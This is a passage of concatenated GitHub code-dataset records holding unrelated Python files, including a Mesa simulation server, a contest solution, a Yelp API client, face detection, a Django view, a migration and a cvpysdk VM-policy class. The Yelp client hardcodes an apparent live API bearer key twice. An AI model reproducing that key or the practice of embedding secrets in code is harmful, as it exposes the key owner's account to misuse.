os.path.abspath(filename)\nfl = FileLoader(filename)\ncanvas = fl.get_canvas(1080)\n\nmodel_params = {\n \"ks\": mesa.visualization.Slider(\"Sensitivity to static potential kS\", 3, 1.0, 10.0, 0.5),\n \"ko\": mesa.visualization.Slider(\"Sensitivity to occupied cell kO\", 0.0, 0.0, 1.0, 0.1),\n \"kd\": mesa.visualization.Slider(\"Sensitivity to diagonal movement kD\", 0.5, 0.0, 1.0, 0.1),\n \"leader_movement_duration\": mesa.visualization.Slider(\"Movement duration for leader\", 2, 2, 6, 1),\n \"agent_movement_duration\": mesa.visualization.Slider(\"Movement duration for followers\", 3, 2, 6, 1),\n \"penalization_orientation\": mesa.visualization.Slider(\"Penalization for incorrect orientation\", 1.0, 0.0, 1.0, 0.1),\n \"leader_front_location_switch\": mesa.visualization.Checkbox(\"Switch for leader location at the front\", False),\n \"fileloader\": fl\n}\n\nserver = mesa.visualization.ModularServer(\n RoomModel,\n [canvas],\n \"Room Model\",\n model_params,\n)\nserver.port = 8521 # The default","repo_name":"bumbac/MT","sub_path":"src/roommodel/visualization/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33182726735","text":"import sys\nimport io\n\n#Problem 4\n# Solution heavily inspired by: https://github.com/Diusrex/UVA-Solutions/blob/master/10687%20Monitoring%20the%20Amazon.cpp\ntxt = \"\"\"4 \n1 0 0 1 -1 0 0 -1\n8 \n1 0 1 1 0 1 -1 1 -1 0 -1 -1 0 -1 1 -1\n6 \n0 3 0 4 1 3 -1 3 -1 -4 -2 -5\n0\"\"\"\n\nstdin = io.StringIO(txt)\n#Actual use (Comment the below line for testing)\nstdin = sys.stdin\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n def __lt__(self, other):\n if self.x != other.x:\n return self.x < other.x\n return self.y < other.y\n\ndef square(num):\n return num * num\n\ndef find_closest_for_all(points, n, two_neighbors):\n n = len(points)\n for i in range(n):\n two_neighbors[i][0], two_neighbors[i][1] = -1, -1\n first_distance, second_distance = 1000000000000, 1000000000000\n \n for j in range(n):\n if i != j:\n sq_distance = (points[i].x - points[j].x)**2 +(points[i].y - points[j].y)**2\n if two_neighbors[i][0] == -1 or first_distance > sq_distance:\n two_neighbors[i][1] = two_neighbors[i][0]\n second_distance = first_distance\n \n two_neighbors[i][0] = j\n first_distance = sq_distance\n elif two_neighbors[i][1] == -1 or second_distance > sq_distance:\n two_neighbors[i][1] = j\n second_distance = sq_distance\n\ndef dfs(node, two_neighbors, reached):\n if node == -1 or reached[node]:\n return 0\n reached[node] = True\n return 1 + dfs(two_neighbors[node][0], two_neighbors, reached) + dfs(two_neighbors[node][1], two_neighbors, reached)\n\n\nwhile True:\n n = int(stdin.readline().strip())\n if n == 0:\n break\n data = list(map(int, stdin.readline().split()))\n\n points= []\n for i in range(0, len(data), 2):\n points.append(Point(data[i], data[i+1]))\n\n station = points[0]\n points.sort(key=lambda p: (p.x, p.y))\n two_neighbors = [[-1, -1] for _ in range(n)]\n find_closest_for_all(points, n, two_neighbors)\n\n reached = [False] * n\n valid = False\n for i in range(n):\n if station.x == points[i].x and station.y == points[i].y:\n valid = (dfs(i, two_neighbors, reached) == n)\n\n if valid:\n print(\"All stations are reachable.\")\n else:\n print(\"There are stations that are unreachable.\")\n","repo_name":"William-CarterG/Algorithms-Competitive-Programming-Solutions","sub_path":"Lecture 06/10687 - Monitoring the Amazon.py","file_name":"10687 - Monitoring the Amazon.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12479881401","text":"import requests\nimport urllib\nfrom urllib.error import HTTPError\nfrom urllib.parse import quote\n\n''' Cette classe va être celle qui va nous permettre de nous connecter à l'API de Yelp et de récupérer ensuite ses données\nNous effectuons seulement la requête sans mettre en compte de paramètres, l'objectif de cette classe étant uniquement la connection'''\n\nclass API:\n ''' La classe API possède seulement un attribut statut qui sera déterminé lors de la connection\n Nous aurions pu utiliser des attributs host ou path si nous aurions voulu réutiliser ce code pour d'autres Webservices mais nous l'utiliserons en pratique\n juste pour Yelp API.\n Elle possède deux méthodes correspondants aux endpoints que nous utiliserons dans le projet, et une méthode permettant de comprendre le statut du code\n '''\n def __init__(self,statut : str = None):\n self.statut = statut\n\n\n def connect_search(self,parameters = None):\n\n ''' Cette première méthode permet à partir de paramètres de rechercher un restaurant sur la base de données de Yelp\n Les paramètres et les fonctions dessus seront implémentées dans services\n Cette fonction permet alors de se connecter à l'endpoint https://api.yelp.com/v3/businesses/search\n '''\n parameters = parameters or {}\n key = \"jTKT7VXQpA2_ovJ98xuWrUvbGrrf2CnKqQUpjHeYZ-N93IsP-HcvvHCctE41ngSp6Ox4xtrOquyVe2xSBiEM7XZYJdrYP834Q_Dm5E-X8j3AlyeR4V1WMeggytlvYXYx \"\n url = '{0}{1}'.format('https://api.yelp.com/v3', quote('/businesses/search'.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % key,\n }\n print(u'Se connecte à {0} ...'.format(url))\n res = requests.request('GET', url, headers=headers, params = parameters)\n self.statut = res.status_code\n return (res.json())\n\n\n def connect_id(self, id : str = None):\n\n ''' Cette seconde méthode permet de rechercher un restaurant sur la base de données de Yelp à partir de son identifiant\n Les fonctions dessus seront implémentées dans services\n Cette fonction permet alors de se connecter à l'endpoint https://api.yelp.com/v3/businesses/{id}\n '''\n id = id or ''\n endpoint = '/businesses/' + id\n key = \"jTKT7VXQpA2_ovJ98xuWrUvbGrrf2CnKqQUpjHeYZ-N93IsP-HcvvHCctE41ngSp6Ox4xtrOquyVe2xSBiEM7XZYJdrYP834Q_Dm5E-X8j3AlyeR4V1WMeggytlvYXYx \"\n url = '{0}{1}'.format('https://api.yelp.com/v3', quote(endpoint.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % key,\n }\n print(u'Se connecte à {0} ...'.format(url))\n res = requests.request('GET', url, headers=headers, params = None)\n self.statut = res.status_code\n return (res.json())\n\n\n def statutconnection(self):\n\n '''Cette méthode permet de savoir si la connection a réussi/échoué et quel est le message d'erreur associé\n Le statuscode associé au module resquests ne renvoyant uniquement un code ceci peut être utile pour comprendre plus rapidement des erreurs\n '''\n a = self.statut\n if a == 200:\n return(\"tout s'est bien passé\")\n if a == 201:\n return(\"ressource crée avec succès\")\n if a == 202:\n return(\"requête acceptée, sans garantie du résultat\")\n if a == 400:\n return(\"erreur de syntaxe dans la requête\")\n if a == 403:\n return(\"ressource interdite (droits)\")\n if a == 401:\n return(\"erreur, authentification nécessaire\")\n if a == 404:\n return(\"ressource non trouvée\")\n if a == 405:\n return(\"une mauvaise méthode http a été utilisée\")\n if a == 500:\n return(\"erreur côté serveur\")\n if a == 503:\n return(\"service temporairement indisponible\")\n if a == None:\n return(\"Connectez vous d'abord à l'API avant de demander le statut\")\n else:\n return(a + \"un résultat 2XX indique un succès, un résultat 4XX ou 5XX une erreur\")\n \n\n ","repo_name":"lk34000/EnsaEats","sub_path":"api/API/Connect_API.py","file_name":"Connect_API.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36994881845","text":"import numpy as np\nfrom air_calculations import calculate_air_properities\n\n\ndef calculateChanges(mission_data, include_apu_flow = False, dt = 10):\n # define the mission variables array[time, height, temperature, pressure, density]\n mission_properties = np.array([0, 0, 0, 0])\n for phase in mission_data:\n time = phase[-1]\n rate_of_climb = 1 / time * (phase[1] - phase[0])\n engine_fuel_flow = phase[2] / time\n apu_fuel_flow = phase[3]\n increment = np.array([1, rate_of_climb, engine_fuel_flow, apu_fuel_flow])\n steps = np.zeros((int(np.floor(time/dt)), increment.shape[0]))\n steps[:, :] = np.multiply(increment, dt)\n if time%dt>0:\n steps = np.vstack((steps, np.multiply(increment, time%dt)))\n mission_properties = np.vstack((mission_properties, steps))\n if not include_apu_flow:\n mission_properties = np.delete(mission_properties, -1, 1)\n return np.multiply(mission_properties, np.array([1, 1, -1]))\n\n\ndef defineProfile(changes, deviation_reserves, rate_reserve, evaporation):\n total_fuel = np.sum(changes[:, 2])\n if changes.shape[1] > 3:\n total_fuel += np.sum(changes[:, 3])\n starting_fuel = total_fuel*(1+rate_reserve/(1-rate_reserve)) + deviation_reserves + evaporation\n profile = np.empty_like(changes)\n profile[0, 2] = starting_fuel\n changes[:, 2] = np.multiply(changes[:, 2], -1)\n for row in range(changes.shape[0]):\n if row == 0:\n profile[row, :1] = changes[row, :1]\n else:\n profile[row, :] = profile[row - 1, :] + changes[row, :]\n return np.multiply(profile, np.array([1, 1, -1]))\n\n\ndef defineAirProfile(profile):\n air_profile = np.empty_like(profile)\n for row in range(profile.shape[0]):\n air_profile[row, :] = calculate_air_properities(profile[row, 1])\n return air_profile","repo_name":"0110lekniw/LH2-tanks-simulation","sub_path":"define_mission.py","file_name":"define_mission.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"30589209057","text":"#Import the libraries\nimport cv2\n\nvideo=True #if true start the video\n\n#Funtion to detect the object\ndef detect(path):\n\n #Classificator\n face_cascade = cv2.CascadeClassifier(\n filename=f\"{cv2.data.haarcascades}/haarcascade_frontalface_default.xml\"\n )\n\n #Condition to start the function\n if video:\n video_cap = cv2.VideoCapture('arsene.mp4') \n else:\n ('No video')\n\n while True:\n # Capture frame-by-frame\n ret, img = video_cap.read()\n\n #converting to gray image for faster video processing\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n #Parameters of CascadeClassifier\n faces = face_cascade.detectMultiScale(gray, \n scaleFactor=1.5, # Mudança de escala a cada passada\n minNeighbors=5 # Verifier the neighbors before promote the point \n )\n\n # if at least 1 face detected\n if len(faces) >= 0:\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n cv2.rectangle(img, pt1= (x, y), pt2= (x + w, y + h), color=(0, 255, 0), thickness=2)\n \n # Display the resulting frame\n cv2.imshow('Face Detection on Video', img)\n\n #wait for 'c' to close the application\n if cv2.waitKey(1) & 0xFF == ord('c'):\n break\n #Defining size for the output video\n width = int(video_cap.get(cv2.CAP_PROP_FRAME_WIDTH)) # float `width`\n height = int(video_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n \n #Local and parameters for the output video\n output_video = cv2.VideoWriter( './saida/out.avi',cv2.VideoWriter_fourcc(*'DIVX'), 24, (width, height))\n output_video.release()\n video_cap.release()\n\n\n#Main Function to start the program\ndef main():\n cascadeFilePath=\"haarcascade_frontalface_alt.xml\"\n detect(cascadeFilePath)\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ipatriciahonorato/Modulo-6","sub_path":"Prova 2/Prova/exemplos/tentativa_final.py","file_name":"tentativa_final.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1189370361","text":"from models.heuristica import decision\nfrom models.bfs import breadth_first_search\nfrom models.dfs import depthFirstSearch\nfrom models.ga import ga\nfrom utils.moves import flip\nfrom utils.colision import is_coliding\n\nfrom time import sleep\nfrom datetime import datetime\n\n\ndef get_action(state, model='heuristica'):\n if model == 'heuristica':\n action = decision(state)\n return action\n\n elif model == 'bfs':\n sleep(3)\n s = datetime.now()\n player = [state['player'], 0]\n paths = breadth_first_search(\n player, goal=-90*103, game_state=state['state']\n )\n score = final_score(paths)\n print(score)\n print(datetime.now() - s)\n return paths\n\n elif model == 'dfs':\n sleep(1)\n s = datetime.now()\n player = [state['player'], 0]\n paths = depthFirstSearch(\n player, goal=-90*33, game_state=state['state']\n )\n score = final_score(paths)\n print(datetime.now() - s)\n print(score)\n \n # sleep(1)\n return paths\n\n elif model == 'GA':\n sleep(1)\n s = datetime.now()\n paths = ga(state=state)\n paths = list(\n map(lambda action: 'FLIP' if action == 1 else 'STAY', paths))\n print(datetime.now() - s)\n\n return paths\n\n elif model == 'genetico_2':\n pass\n\n else:\n action = None\n return action\n\n\ndef evaluation(actions, state):\n player = state['player']\n state = state['state']\n\n score = 0\n steps = 1\n\n for action in actions:\n if action == 'FLIP':\n score -= 5\n player = flip[player]\n\n if is_coliding(player, state, steps=steps):\n return score - 200\n\n steps += 1\n\n return score\n\n\ndef final_score(actions):\n score = 0\n for action in actions:\n if action == 'FLIP':\n score -= 5\n score += 10\n return score\n\n\ndef best_fit(paths, state):\n return max(paths, key=lambda x: evaluation(x[1], state))\n","repo_name":"Cangerana/fulga_do_xadrez","sub_path":"models/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34651604014","text":"from PIL import Image\nimport os.path\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, Http404\n\nfrom .donate_o_meter import DonateOMeter\nfrom .models import DonateAim\n\n# Create your views here.\ndef meter16(request):\n dir_ = os.path.dirname(os.path.realpath(__file__))\n imgs = os.path.join(dir_, 'imgs')\n empty_path = os.path.join(imgs, 'sektglas.png')\n full_path = os.path.join(imgs, 'sektglas-voll.png')\n empty = Image.open(empty_path)\n full = Image.open(full_path)\n aim = None\n try:\n aim = DonateAim.objects.get(pk=2016)\n except DonateAim.DoesNotExist as e:\n raise Http404('No DonateAim for 2016')\n box = 24, 0, 176, 332\n meter = DonateOMeter(empty, full, aim.aim, box=box)\n img = meter.draw(aim.current)\n response = HttpResponse(content_type='image/png')\n img.save(response, 'PNG')\n return response\n","repo_name":"FabianWe/csd-freiburg-forms","sub_path":"csd_freiburg_forms/donate_o_meter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9735557020","text":"\"\"\"initial migration\n\nRevision ID: 114aee2ddff4\nRevises: None\nCreate Date: 2016-05-09 20:37:48.513756\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '114aee2ddff4'\ndown_revision = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('aircraft',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('icao', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('icao')\n )\n op.create_table('flight',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('aircraft_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=8), nullable=True),\n sa.Column('seen', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['aircraft_id'], [u'aircraft.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('flight_position',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('flight_id', sa.Integer(), nullable=False),\n sa.Column('altitude', sa.Integer(), nullable=True),\n sa.Column('latitude', sa.Float(), nullable=True),\n sa.Column('longitude', sa.Float(), nullable=True),\n sa.Column('speed', sa.Integer(), nullable=True),\n sa.Column('track', sa.Integer(), nullable=True),\n sa.Column('vertical_rate', sa.Integer(), nullable=True),\n sa.Column('time', sa.DateTime(), nullable=False),\n sa.ForeignKeyConstraint(['flight_id'], [u'flight.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('flight_position')\n op.drop_table('flight')\n op.drop_table('aircraft')\n ### end Alembic commands ###\n","repo_name":"rafaelmartins/sbs1-web","sub_path":"migrations/versions/114aee2ddff4_initial_migration.py","file_name":"114aee2ddff4_initial_migration.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22037871041","text":"import socket\r\nimport struct\r\nimport json\r\nimport os\r\nfrom os.path import join, getsize\r\n\r\n\r\ndef UploadInSocket(filename):\r\n HOST = '192.168.2.109'\r\n PORT = 54321\r\n ADDR = (HOST,PORT)\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n try:\r\n s.connect(ADDR)\r\n except Exception as e:\r\n print(e)\r\n else:\r\n ver = 1\r\n p_type = 0\r\n\r\n cmd_t = 1\r\n pack_no = 0\r\n\r\n\r\n dicJson = {'access_token':'','chapterId':'', 'shareFlag':0,'fileName':'test1.bmp'\r\n ,'remark':''}\r\n dicJson['fileSize'] = getsize(filename)\r\n data_length = dicJson['fileSize']\r\n\r\n js = json.dumps(dicJson).encode('utf8')\r\n sub_len = len(js)\r\n\r\n struct_data = struct.pack('!bbHHHI%ds'%sub_len, ver,p_type,sub_len,cmd_t,pack_no,data_length,js)\r\n print(struct_data)\r\n\r\n s.send(struct_data)\r\n rec = s.recv(1024)\r\n print(rec)\r\n with open(filename, 'rb') as f:\r\n while True:\r\n filedata = f.read(512)\r\n if not filedata:\r\n break\r\n\r\n s.send(filedata)\r\n\r\n\r\nif __name__ == '__main__':\r\n UploadInSocket(r'f:\\test1.bmp')","repo_name":"phantomwhite/SocketTest","sub_path":"TestSocket.py","file_name":"TestSocket.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3727780790","text":"from collections import defaultdict\nclass Solution: \n def topo_sort(self, node):\n if self.color[node] == 1:\n return False\n if self.color[node] == 2: \n return True\n\n self.color[node] = 1 \n for child in self.graph[node]:\n if not self.topo_sort(child):\n return False\n\n self.safe.append(node)\n self.color[node] = 2\n return True\n def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:\n # visited 1 save 2 inital 0\n self.safe = []\n self.color = [0 for i in range(len(graph))]\n self.graph = graph\n for node in range(len(graph)):\n if self.color[node] == 0:\n self.topo_sort(node)\n self.safe.sort()\n return self.safe\n","repo_name":"zerabruck/Competitive-programming","sub_path":"A2sv/find_eventual_safe_states.py","file_name":"find_eventual_safe_states.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6882513345","text":"import logging\n\nimport psycopg2\nimport uuid\nlogger = logging.getLogger('letSpotify.' + __name__)\n\n\nclass LoginToken:\n def __init__(self, db):\n self.db = db\n\n def check_token(self, data):\n sql = \"SELECT token, login, valid, fid, cookie FROM login_token WHERE token = %s;\"\n result = yield self.db.execute(sql, (data['token'],))\n res = {}\n flag = False\n for i in result.fetchall():\n if i:\n res['token'] = i[0]\n res['login'] = i[1]\n res['valid'] = i[2]\n res['fid'] = i[3]\n res['cookie'] = i[4]\n flag = True\n if not flag:\n return {}, False, \"token not exist\"\n return res, True, \"\"\n\n def create_token(self):\n token = str(uuid.uuid4())\n sql = \"\"\"\n INSERT INTO login_token (token, login, valid, fid)\n VALUES (%s, %s, %s, %s);\n \"\"\"\n try:\n result = yield self.db.execute(sql, (token,\n False,\n False,\n 0,)\n )\n return token, True, \"\"\n except psycopg2.IntegrityError:\n return \"\", False, \"\"\n\n\n def update_token(self, data):\n sql = \"\"\"UPDATE login_token SET (login, valid, fid, cookie) = (%s, %s, %s, %s) WHERE token = %s\"\"\"\n try:\n yield self.db.execute(sql, (data['login'],\n data['valid'],\n data['fid'],\n data['cookie'],\n data['token'],)\n )\n except:\n return False, False, \"\"\n return True, True, \"\"\n","repo_name":"LetSpotify/letspotify-server","sub_path":"lib/login_token.py","file_name":"login_token.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34875890663","text":"from __future__ import unicode_literals\n\nfrom .exception import SDKException\nfrom .job import Job\n\n\nclass VirtualMachinePolicies(object):\n \"\"\"Class for representing all the Virtual Machine Policies associated with the Commcell.\"\"\"\n\n def __init__(self, commcell_object):\n \"\"\"Initialize object of the VirtualMachinePolicies class.\n\n Args:\n commcell_object (object) -- instance of the Commcell class\n Returns:\n object - instance of the VirtualMachinePolicies class\n \"\"\"\n self._commcell_object = commcell_object\n\n self._VMPOLICIES_URL = self._commcell_object._services['VM_ALLOCATION_POLICY']\n self._ALL_VMPOLICIES_URL = self._commcell_object._services['ALL_VM_ALLOCATION_POLICY']\n self._VCLIENTS_URL = self._commcell_object._services['GET_VIRTUAL_CLIENTS']\n self._QOPERATION_URL = self._commcell_object._services['EXECUTE_QCOMMAND']\n\n self._vm_policies = None\n self.refresh()\n\n def __str__(self):\n \"\"\"Representation string consisting of all virtual machine policies of the commcell.\n\n Returns:\n str - string of all the virtual machine policies associated with the commcell\n \"\"\"\n representation_string = '{:^5}\\t{:^28}'.format('S. No.', 'Virtual Machine Policy')\n\n for (index, vm_policy) in enumerate(self._vm_policies):\n sub_str = '{:^5}\\t{:20}\\n'.format(index + 1, vm_policy)\n representation_string += sub_str\n\n return representation_string.strip()\n\n def __repr__(self):\n \"\"\"Representation string for the instance of the Clients class.\"\"\"\n return \"VirtualMachinePolicies class instance for Commcell: '{0}'\".format(\n self._commcell_object.commserv_name)\n\n def _get_vm_policies(self):\n \"\"\"Gets all the virtual machine policies associated to the commcell specified by the\n Commcell object.\n\n Returns:\n dict - consists of all virtual machine policies for the commcell\n {\n \"vm_policy1_name\": {\n \"id\": vm_policy1Id,\n \"policyType\": policyTypeId\n }\n \"vm_policy2_name\": {\n \"id\": vm_policy2Id,\n \"policyType\": policyTypeId\n }\n }\n Raises:\n SDKException:\n if response is empty\n if response is not success\n \"\"\"\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='GET', url=self._ALL_VMPOLICIES_URL)\n\n if flag:\n if response.json() and 'policy' in response.json():\n vm_policies = response.json()['policy']\n\n if vm_policies == []:\n return {}\n\n vm_policies_dict = {}\n\n for vm_policy in vm_policies:\n temp_name = vm_policy['entity']['vmAllocPolicyName'].lower()\n temp_id = str(vm_policy['entity']['vmAllocPolicyId']).lower()\n temp_policy_type = str(vm_policy['entity']['policyType']).lower()\n vm_policies_dict[temp_name] = {\n 'id': temp_id,\n 'policyType': temp_policy_type\n }\n\n return vm_policies_dict\n else:\n return {}\n else:\n response_string = self._commcell_object._update_response_(response.text)\n raise SDKException('Response', '101', response_string)\n\n def _set_vclient_and_vcenter_names(self, vm_policy_options, vclient_name):\n \"\"\"Sets the virtualization client name and the vcenter name for the corresponding vclient\n\n Args:\n vm_policy_options -- optional policy paramters passed by user (None if user\n passes nothing\n\n vclient_name -- virtualization client name\n\n Raises:\n SDKException:\n if response is not success\n\n if no virtualization client exists on the Commcell\n\n if virtualization client with given name does not exist on this Commcell\n \"\"\"\n clients = self._commcell_object.clients\n vclient_name_dict = clients._get_virtualization_clients()\n\n if not vclient_name_dict:\n err_msg = 'No virtualization clients exist on this Commcell.'\n raise SDKException('Virtual Machine', '102', err_msg)\n\n if vclient_name in vclient_name_dict:\n vm_policy_options['clientName'] = vclient_name\n # fetching the vcenter from the corresponding instance object\n client = self._commcell_object.clients.get(vm_policy_options['clientName'])\n agent = client.agents.get('Virtual Server')\n instance_keys = next(iter(agent.instances._instances))\n instance = agent.instances.get(instance_keys)\n vm_policy_options['vCenterName'] = instance.server_host_name[0]\n else:\n err_msg = 'Virtualization client \"{0}\" does not exist'.format(vclient_name)\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def _get_proxy_client_json(self, options):\n try:\n id_ = self._commcell_object.clients[options.get(\"proxy_client\")][\"id\"]\n except KeyError:\n return dict()\n return{\n \"clientId\": int(id_),\n \"clientName\": options[\"proxy_client\"]\n }\n\n def _prepare_add_vmpolicy_json_default(self, vm_policy_options):\n \"\"\"Sets values for creating the add policy json\n\n Args:\n vm_policy_options (dict) -- main dict containing vm policy options\n\n Returns:\n vm_policy_json (dict) -- json to be passed for add policy POST request\n \"\"\"\n # setting the json values using functions for elements having nested values\n _datacenter = self._get_data_center_json(vm_policy_options)\n _entity = VirtualMachinePolicies._entity_json(vm_policy_options)\n _esxservers = [{\"esxServerName\": esx_server} for esx_server in vm_policy_options.get(\"esxServers\", \"\")]\n _datastores = [{\"dataStoreName\": datastore} for datastore in vm_policy_options.get(\"dataStores\", \"\")]\n _security_associations = VirtualMachinePolicies._security_associations_json(\n vm_policy_options)\n _network_names = VirtualMachinePolicies._network_names_json(vm_policy_options)\n\n _vm_policy_json = {\n 'action': 0, # 0 for add\n 'policy': {\n \"vmNameEditType\": vm_policy_options.get(\"vm_name_edit\", 1),\n \"vmNameEditString\": vm_policy_options.get(\"vm_name_edit_string\", \"Replicated_\"),\n \"createIsolatedNetwork\": False,\n \"isResourceGroupPolicy\": True,\n \"resourcePoolPath\": \"//\",\n \"destinationHyperV\": {\n \"clientId\": int(self._commcell_object.clients[vm_policy_options['clientName']][\"id\"]),\n \"clientName\": vm_policy_options['clientName']\n },\n 'allDataStoresSelected': vm_policy_options.get('allDataStoresSelected', False),\n 'daysRetainUntil': vm_policy_options.get('daysRetainUntil', -1),\n 'migrateVMs': vm_policy_options.get('migrateVMs', False),\n 'senderEmailId': vm_policy_options.get('senderEmailId', ''),\n 'notifyToEmailIds': vm_policy_options.get('notifyToEmailIds', ''),\n 'quotaType': vm_policy_options.get('quotaType', 0),\n 'maxVMQuota': vm_policy_options.get('maxVMQuota', 10),\n 'namingPattern': vm_policy_options.get('namingPattern', ''),\n 'description': vm_policy_options.get('description', ''),\n 'enabled': vm_policy_options.get('enabled', True),\n 'allowRenewals': vm_policy_options.get('allowRenewals', True),\n 'disableSuccessEmail': vm_policy_options.get('disableSuccessEmail', False),\n 'performAutoMigration': vm_policy_options.get('performAutoMigration', False),\n 'allESXServersSelected': vm_policy_options.get('allESXServersSelected', False),\n 'dataCenter': _datacenter,\n 'entity': _entity,\n \"proxyClientEntity\": self._get_proxy_client_json(vm_policy_options),\n \"networkList\": [\n {\n \"destinationNetwork\": vm_policy_options.get(\"destination_network\"),\n \"sourceNetwork\": \"Any Network\"\n }\n ]\n }\n }\n\n # adding the optional values for the json if they exist\n if _esxservers and not _vm_policy_json['policy']['allESXServersSelected']:\n _vm_policy_json['policy']['esxServers'] = _esxservers\n\n if _datastores and not _vm_policy_json['policy']['allDataStoresSelected']:\n _vm_policy_json['policy']['dataStores'] = _datastores\n\n if _network_names:\n _vm_policy_json['policy']['networkNames'] = _network_names\n\n if _security_associations:\n _vm_policy_json['policy']['securityAssociations'] = _security_associations\n\n # setting json values that are specific to a particular policy type\n\n if vm_policy_options[\"policyType\"] == 4: # for Live Mount policy\n self._prepare_add_vmpolicy_json_livemount(vm_policy_options, _vm_policy_json)\n # TODO: future support for Clone from Template policy\n elif vm_policy_options[\"policyType\"] == 0:\n pass\n # TODO: future support for Restore from Backup policy\n else:\n pass\n\n return _vm_policy_json\n\n def _get_data_center_json(self, vm_policy_options):\n \"\"\"Returns value for the datacenter json value in the add policy json\n\n Args:\n vm_policy_options (dict) -- main dict containing vm policy options\n\n Returns:\n _datacenter (dict) -- datacenter json to add to vm policy json\n \"\"\"\n client = self._commcell_object.clients.get(vm_policy_options['clientName'])\n vm_policy_options['clientId'] = client.client_id\n agent = client.agents.get('Virtual Server')\n instance_keys = next(iter(agent.instances._instances))\n instance = agent.instances.get(instance_keys)\n vm_policy_options['instanceId'] = instance.instance_id\n\n # self._set_data_center(vm_policy_options)\n _datacenter = {\n 'vCenterName': vm_policy_options['vCenterName'],\n 'instanceEntity': {\n 'clientId': int(vm_policy_options['clientId']),\n 'instanceName': vm_policy_options['clientName'],\n 'instanceId': int(vm_policy_options['instanceId'])\n },\n }\n\n return _datacenter\n\n def _set_data_center(self, vm_policy_options):\n \"\"\"Sets the datacenter name if provided by user, or sets the alphabetically lowest one in\n the vcenter as default\n\n Args:\n vm_policy_options (dict) -- main dict containing vm policy options\n\n Raises:\n SDKException:\n if specified datacenter is not found for the corresponding virtualization\n client\n\n if no datacenter is found for the virtaulization client\n\n if no response is found\n\n if response is not a success\n \"\"\"\n get_datacenter_xml = (\n ''\n ''\n )\n response_json = self._commcell_object._qoperation_execute(request_xml=get_datacenter_xml)\n\n if 'dataCenterList' in response_json:\n all_nodes = response_json['dataCenterList']\n datacenter_dict = {}\n for node in all_nodes:\n if node['vCenterName'] == vm_policy_options['vCenterName']:\n datacenter_dict[node['dataCenterName']] = node['dataCenterId']\n if 'dataCenterName' in vm_policy_options:\n if vm_policy_options['dataCenterName'] in datacenter_dict:\n vm_policy_options['dataCenterId'] = datacenter_dict[\n vm_policy_options['dataCenterName']]\n else:\n # if no datacenter is found for the vclient, throw error\n err_msg = (\n 'No datacenter found with name: {0} in virtual client: {1}'.format(\n vm_policy_options['dataCenterName'],\n vm_policy_options['clientName'])\n )\n raise SDKException('Virtual Machine', '102', err_msg)\n else:\n vm_policy_options['dataCenterName'] = next(iter(datacenter_dict))\n vm_policy_options['dataCenterId'] = datacenter_dict[vm_policy_options[\n 'dataCenterName']]\n else:\n # if no datacenter is found for the vclient, throw error\n err_msg = ('No datacenter found for virtual client: {0}'.format(\n vm_policy_options['clientName']))\n raise SDKException('Virtual Machine', '102', err_msg)\n\n def _clone_vm_policy(self, vm_policy_json):\n \"\"\"Private method to clone a vm policy from VirtualMachinePolicy object\n\n Args:\n vm_policy_json -- dict containing information to clone a particular policy\n along with optional information passed by user\n Returns:\n object -- VirtualMachinePolicy object of the newly cloned policy\n\n Raises:\n SDKException:\n if failed to create vm policy\n\n if response is empty\n\n if response is not success\n \"\"\"\n (flag, response) = self._commcell_object._cvpysdk_object.make_request(\n method='POST', url=self._ALL_VMPOLICIES_URL, 